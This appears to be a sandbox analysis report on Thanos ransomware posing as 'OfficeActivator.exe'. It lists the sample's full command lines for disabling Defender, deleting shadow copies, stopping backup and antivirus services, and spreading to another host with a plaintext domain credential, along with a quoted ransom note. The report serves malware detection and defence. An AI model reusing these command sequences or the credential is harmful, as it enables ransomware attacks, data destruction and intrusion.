Analysis Overview
SHA256
8441f92e8460a7b2ed37ee96affe547a65589b2e8e980a18a6b08b786b48465d
Threat Level: Known bad
The file OfficeActivator.exe was found to be: Known bad.
Malicious Activity Summary
Thanos executable
Modifies WinLogon for persistence
Modifies Windows Defender Real-time Protection settings
Contains code to disable Windows Defender
Disables service(s)
Thanos family
Modifies boot configuration data using bcdedit
Deletes shadow copies
Downloads MZ/PE file
Blocklisted process makes network request
Drops startup file
Windows security modification
Checks computer location settings
Executes dropped EXE
Impair Defenses: Safe Mode Boot
Enumerates connected drives
Network Service Discovery
Modifies WinLogon
Legitimate hosting services abused for malware hosting/C2
Launches sc.exe
Enumerates physical storage devices
System Network Configuration Discovery: Internet Connection Discovery
Unsigned PE
System Location Discovery: System Language Discovery
Runs net.exe
Runs ping.exe
Suspicious use of SendNotifyMessage
Uses Volume Shadow Copy service COM API
Modifies registry key
Kills process with taskkill
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Interacts with shadow copies
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-08 17:28
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Thanos executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Thanos family
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-08 17:28
Reported
2024-11-08 17:28
Platform
win7-20240903-en
Max time kernel
5s
Max time network
9s
Command Line
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Users\\Admin\\AppData\\Local\\Temp\\OfficeActivator.exe,C:\\Windows\\system32\\userinit.exe" | C:\Windows\system32\reg.exe | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Impair Defenses: Safe Mode Boot
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WinDefend | C:\Windows\system32\reg.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\shutdown.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\system32\shutdown.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe
"C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe"
C:\Windows\system32\reg.exe
"reg.exe" delete HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\WinDefend /f
C:\Windows\system32\bcdedit.exe
"bcdedit.exe" /set {default} safeboot network
C:\Windows\system32\reg.exe
"reg.exe" add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe","C:\Windows\system32\userinit.exe" /f
C:\Windows\system32\net.exe
"net.exe" user Admin ""
C:\Windows\system32\shutdown.exe
"shutdown.exe" /r /t 0
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user Admin ""
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x1
Network
Files
memory/2676-0-0x000007FEF5063000-0x000007FEF5064000-memory.dmp
memory/2676-1-0x0000000000070000-0x000000000008A000-memory.dmp
memory/2676-2-0x000007FEF5060000-0x000007FEF5A4C000-memory.dmp
memory/2584-7-0x000000001B670000-0x000000001B952000-memory.dmp
memory/2676-8-0x000007FEF5060000-0x000007FEF5A4C000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-08 17:28
Reported
2024-11-08 17:30
Platform
win10v2004-20241007-en
Max time kernel
95s
Max time network
146s
Command Line
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Disables service(s)
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
Deletes shadow copies
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\System32\mshta.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\n1xyzgh2.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\E: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\g: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\e: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\g: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\h: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\e: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\h: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..." | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "Your Files are Encrypted.\r\n\r\nDon’t worry, you can return all your files!\r\n\r\nYou've got 48 hours(2 Days), before you lost your files forever.\r\nI will treat you good if you treat me good too.\r\n\r\nThe Price to get all things to the normal : 20,000$\r\nMy BTC Wallet ID :\r\n1F6sq8YvftTfuE4QcYxfK8s5XFUUHC7sD9\r\n\r\nContact :\r\[email protected]\r\n" | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
Network Service Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\arp.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\sc.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\n1xyzgh2.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SYSTEM32\taskkill.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\n1xyzgh2.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\n1xyzgh2.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\n1xyzgh2.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe
"C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
C:\Windows\SYSTEM32\net.exe
"net.exe" stop avpsus /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop McAfeeDLPAgentService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop mfewc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BMR Boot Service /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop NetBackup BMR MTFTP Service /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop DefWatch /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop ccEvtMgr /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop ccSetMgr /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop SavRoam /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop RTVscan /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop QBFCService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop QBIDPService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop Intuit.QuickBooks.FCS /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop QBCFMonitorService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop YooBackup /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop YooIT /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop zhudongfangyu /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop stc_raw_agent /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VSNAPVSS /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamTransportSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamDeploymentService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop VeeamNFSSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop veeam /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop PDVFSService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecVSSProvider /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecAgentAccelerator /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecAgentBrowser /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecDiveciMediaService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecJobEngine /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecManagementService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop BackupExecRPCService /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop AcrSch2Svc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop AcronisAgent /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop CASAD2DWebSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop CAARCUpdateSvc /y
C:\Windows\SYSTEM32\net.exe
"net.exe" stop sophos /y
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLTELEMETRY start= disabled
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SQLWriter start= disabled
C:\Windows\SYSTEM32\sc.exe
"sc.exe" config SstpSvc start= disabled
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mspub.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopqos.exe /F
C:\Windows\SYSTEM32\taskkill.exe
"taskkill.exe" /IM mydesktopservice.exe /F
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" Delete Shadows /all /quiet
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
C:\Windows\SYSTEM32\vssadmin.exe
"vssadmin.exe" Delete Shadows /all /quiet
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop avpsus /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop DefWatch /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop RTVscan /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfewc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccEvtMgr /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop zhudongfangyu /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop stc_raw_agent /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sophos /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SavRoam /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccSetMgr /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooBackup /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooIT /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBIDPService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop veeam /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBFCService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VSNAPVSS /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\SYSTEM32\net.exe
"net.exe" use \\10.127.0.120 /USER:SHJPOLICE\amer !Omar2012
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
C:\Users\Admin\AppData\Local\Temp\n1xyzgh2.exe
"C:\Users\Admin\AppData\Local\Temp\n1xyzgh2.exe" \10.127.0.120 -u SHJPOLICE\amer -p !Omar2012 -d -f -h -s -n 2 -c C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe
C:\Windows\SYSTEM32\arp.exe
"arp" -a
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\OfficeActivator.exe
C:\Windows\system32\PING.EXE
ping 127.0.0.7 -n 3
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\system32\fsutil.exe
fsutil file setZeroData offset=0 length=524288 “%s”
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.poweradmin.com | udp |
| US | 8.8.8.8:53 | 228.179.250.142.in-addr.arpa | udp |
| US | 52.1.55.52:443 | www.poweradmin.com | tcp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.55.1.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cutewallpaper.org | udp |
| US | 172.67.211.67:443 | cutewallpaper.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.211.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.208.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
Files
memory/2740-0-0x00007FFE394C3000-0x00007FFE394C5000-memory.dmp
memory/2740-1-0x0000000000740000-0x000000000075A000-memory.dmp
memory/2740-2-0x00007FFE394C0000-0x00007FFE39F81000-memory.dmp
memory/3836-12-0x000001DDF3AF0000-0x000001DDF3B12000-memory.dmp
memory/3836-13-0x00007FFE394C0000-0x00007FFE39F81000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3mxr4kmo.zg3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3836-14-0x00007FFE394C0000-0x00007FFE39F81000-memory.dmp
memory/3836-16-0x00007FFE394C0000-0x00007FFE39F81000-memory.dmp
memory/3836-19-0x00007FFE394C0000-0x00007FFE39F81000-memory.dmp
C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
| MD5 | 0ae29f187b3b8d04009f0d23a579214b |
| SHA1 | a6d3e91ef83e31895bd9096a176a03007e115b64 |
| SHA256 | e20ad0e28e004eb0a6c039d735498d9584b4f01eef97857699a77843713131a0 |
| SHA512 | 4b9ba243592e0884a06bbcccbc80fd5324049c860002403c2bf12fba0b271fa3c876eaaeb9119b745844bf554d8709ea7458c20f0a234f26a76839b7dce5c8d3 |
C:\Users\Admin\AppData\Local\Temp\n1xyzgh2.exe
| MD5 | b1dfb4f9eb3e598d1892a3bd3a92f079 |
| SHA1 | 0fc135b131d0bb47c9a0aaf02490701303b76d3b |
| SHA256 | ab50d8d707b97712178a92bbac74ccc2a5699eb41c17aa77f713ff3e568dcedb |
| SHA512 | 98454df86ddddf20e0b7bd19566006dbec431326e8aa57600aff460e9bec3e6489e43e95be3b252bf78a2edd5c203254508e9b55e756b680c100560664278ca2 |
C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
| MD5 | 78448c43a413ac717e64663839705bea |
| SHA1 | eb1d5dc19ca57979f0168d824509fa923c92cf4e |
| SHA256 | 221bf8f8e9107271b5679746a32f7f13da80f3118429d04a6fc8171202b98683 |
| SHA512 | dd2bf4007b175b41d264b0dbff2507a25023f55893ef6a6bba0762e7baa7f5b58dc8f4a0c7dfa89f5463be62630f8c357cb13e2713d5d8edb9be7ad1ca4dce18 |
memory/2740-129-0x000000001B630000-0x000000001B732000-memory.dmp
memory/2740-130-0x000000001C350000-0x000000001C4F9000-memory.dmp
memory/2740-131-0x00007FFE394C0000-0x00007FFE39F81000-memory.dmp